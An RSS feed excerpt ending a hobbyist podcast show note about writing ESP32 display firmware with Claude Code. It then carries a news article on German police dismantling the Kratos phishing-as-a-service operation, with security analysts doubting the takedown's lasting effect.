I... make that "We" (Claude &amp; I)  will be modifying the code to support an audio side tone through an attached speaker when sending code

</li>

<li>

We will add an output selection switch to the config page to choose any combination of speaker, relay, or LED as output.

</li>

<li>

We will develop a downloadable firmware which I hope to share with the Cheap Yellow Display community.

</li>

</ol>

<p>


</p>

<p>

If you can think of any additional features you would like to see integrated, please drop me an email using the address in my HPR profile.

</p>

<p>


</p>

<p>

I may also work with a friend to attempt to 3d print a case for the entire contraption, and I will be sure to record additional episodes sharing the process.

</p>

<p>


</p>

<p>

I have learned so much throughout this project, about the CYD, ESP32, GUIs, Claude Code, GitHub, and most of all, about myself.  

</p>

<p>


</p>

<p>

Does using AI to develop this code make me a fraud? It still feels like it in some ways.  

</p>

<p>


</p>

<p>

Does it make me more productive?  ABSOLUTELY!  I made consistent forward progress when I only had 30-60 minutes each day to work on it, and everything discussed in this episode was completed in less than a week.  If I had been able to work on it for a few hours uninterrupted, it may have only taken me 3-5 hours.

</p>

<p>


</p>

<p>

Does it empower and inspire me to do more projects like this?  100%  I feel like I had support working with me the whole way.  I was less stressed overall, and it had less of an impact on the amount of and quality of time I spent with my family.

</p>

<p>


</p>

<p>

I will be wrapping up this series soon, without any more 6 month gaps, I hope.

</p>

<p>


</p>

<p>

Until next time...

</p>

<p>

</p>


<p><a href="https://hackerpublicradio.org/eps/hpr4689/index.html#comments">Provide <strong>feedback</strong> on this episode</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[German law enforcement claims to have ‘dismantled’ mega phishing-as-a-service group Kratos]]></title>
<description><![CDATA[A global law enforcement crackdown has seized infrastructure serving the massive phishing-as-a-service (PhaaS) group Kratos, as well resulting in the arrest of an unnamed Kratos “developer and technical administrator” in Indonesia. 



The effort was managed by German law enforcement and involved...]]></description>
<link>https://tsecurity.de/de/3687784/it-security-nachrichten/german-law-enforcement-claims-to-have-dismantled-mega-phishing-as-a-service-group-kratos/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3687784/it-security-nachrichten/german-law-enforcement-claims-to-have-dismantled-mega-phishing-as-a-service-group-kratos/</guid>
<pubDate>Thu, 23 Jul 2026 01:57:56 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">A global law enforcement crackdown has seized infrastructure serving the massive phishing-as-a-service (PhaaS) group Kratos, as well resulting in the arrest of an unnamed Kratos “developer and technical administrator” in Indonesia. </p>



<p class="wp-block-paragraph">The effort was managed by German law enforcement and involved agencies from the US, Indonesia and other countries.</p>



<p class="wp-block-paragraph">Although a <a href="https://www.bka.de/DE/Presse/Listenseite_Pressemitteilungen/2026/Presse2026/260720_PM_Kratos.html" target="_blank" rel="noreferrer noopener">German statement</a> claimed that the Kratos infrastructure “has been completely disabled” and that “Kratos-supported phishing campaigns can no longer be carried out,” cybersecurity analysts and consultants question how much of a dent in enterprise phishing activity will result, and how long it will last.</p>



<p class="wp-block-paragraph">“A server seizure and a single arrest overseas remove infrastructure, not the intellectual property,” said <a href="https://my.idc.com/getdoc.jsp?containerId=PRF004767" target="_blank" rel="noreferrer noopener">Frank Dickson</a>, group VP for security at IDC. “PhaaS kits get cloned, forked and resold routinely, and the 1,800 Kratos customers didn’t vanish. They just lost a vendor in a market where vendors get replaced fast.”</p>



<p class="wp-block-paragraph">He added, “seizing 200-plus servers and arresting the developer pulls a major supplier out of that specific niche. It doesn’t touch the broader phishing economy. For every roach that you squish, there are a hundred that you do not see.”</p>



<p class="wp-block-paragraph"><a href="https://www.linkedin.com/in/noah-m-kenney-27499a166/" target="_blank" rel="noreferrer noopener">Noah Kenney</a>, principal consultant at Digital 520, takes an even more pessimistic view, arguing that there might not even be that much of a short-term phishing slowdown. </p>



<p class="wp-block-paragraph">“What makes this different from a botnet or ransomware takedown is that the people running the attacks were never part of the organization. Kratos was just a vendor,” Kenney said. “The 1,800 customers who bought it still have their target lists, their sending infrastructure and whatever access they had already established. The tooling went dark, but the people phishing your employees last week are still working, shopping for a replacement that already exists. Enterprises should not read this as a drop in (likely) threat volume.”</p>



<p class="wp-block-paragraph">One thing that the security community seems to agree on is that Kratos was a major player in the lucrative PhaaS space. But precisely determining the percentage of PhaaS activity controlled by Kratos is impossible, given that Kratos sold their kits to others. Security researchers even disagree on what they should call Kratos kits.</p>



<p class="wp-block-paragraph">“Microsoft tracks this kit as SneakyLog, others tie it to Sneaky 2FA, and KnowBe4 disputes the lineage entirely. When the security industry cannot agree on what a kit is to be called, that is because renaming and reselling is continuous rather than something that happens after a raid,” Kenney said. “What actually changed this time is the arrest and the [shutdown of the] servers. Standing up new hosting is only a weekend of work, but replacing a developer who understood how to keep an adversary in the middle proxy stable and evasive at scale is harder.”</p>



<p class="wp-block-paragraph">IDC’s Dickson added that the biggest value from the takedown is in the information gleaned from the seized servers. </p>



<p class="wp-block-paragraph">“Kratos operated in the adversary-in-the-middle category, generating convincing fake Microsoft 365 login pages that harvest session tokens and step past MFA, the exact technique behind a lot of the business email compromise activity of the past two years,” he said. “I would love to see what law enforcement does with the customer list. That, my friend, is gold.”</p>



<p class="wp-block-paragraph">Regardless, <a href="https://www.linkedin.com/in/assafmo/" target="_blank" rel="noreferrer noopener">Assaf Morag</a>, a cybersecurity researcher at Flare, dubbed the German crackdown “symbolic,” given Kratos’ reach within phishing circles. </p>



<p class="wp-block-paragraph">He argued that the very nature of software makes it all but impossible to shut down in a meaningful way.</p>



<p class="wp-block-paragraph">“Although this is malicious infrastructure, it is still software, and modern development and deployment practices make it relatively quick to rebuild or replicate,” he said. “Demand is likely to shift to competing providers, allowing the ecosystem to recover even if this particular operation has been disrupted.”</p>



<p class="wp-block-paragraph"><a href="https://www.malwarebytes.com/blog/authors/metallicamvp" target="_blank" rel="noreferrer noopener">Pieter Arntz</a>, malware intelligence researcher at Malwarebytes, agreed that the crackdown is disruptive but not definitive. </p>



<p class="wp-block-paragraph">“This appears to be more than a routine website seizure. The reporting points to a PhaaS platform with centralized infrastructure, subscription-style customers, and Microsoft 365 session theft / MFA-bypass tooling, so taking down the backend likely hurts many downstream affiliates at once. In that sense, it is a meaningful disruption to the phishing ecosystem, not just one campaign,” Arntz said.</p>



<p class="wp-block-paragraph">But, he added, “a rebrand or partial re-emergence is plausible, which is the historical pattern for PhaaS operations. Even if the core infrastructure is gone, the code, customer lists, and operator tradecraft can survive.”</p>



<p class="wp-block-paragraph">This means that customers and affiliates can shift to other phishing kits, he said, so it’s likely that the takedown will create a temporary decline in Kratos-specific activity, but probably not a lasting reduction in phishing overall.</p>



<p class="wp-block-paragraph"><a href="https://www.linkedin.com/in/fvillanustre/" target="_blank" rel="noreferrer noopener">Flavio Villanustre</a>, CISO for the LexisNexis Risk Solutions Group, also concluded that the impact of this crackdown will be short-lived. </p>



<p class="wp-block-paragraph">“For each criminal organization that is dismantled, ten new ones pop out of nowhere. Unless there is a coordinated international effort by more than a few countries, this is a whack-a-mole exercise,” he said. “These are all loosely connected individuals and akin to a lernaean hydra, with two heads growing whenever you chop off one. Their leadership emerges from their lines organically without a real center of control. This makes it almost impossible to completely eliminate these criminal organizations.”</p>
</div></div></div></div>]]></content:encoded>
</item>
</channel>
</rss>
<!-- Generated in 0,86ms -->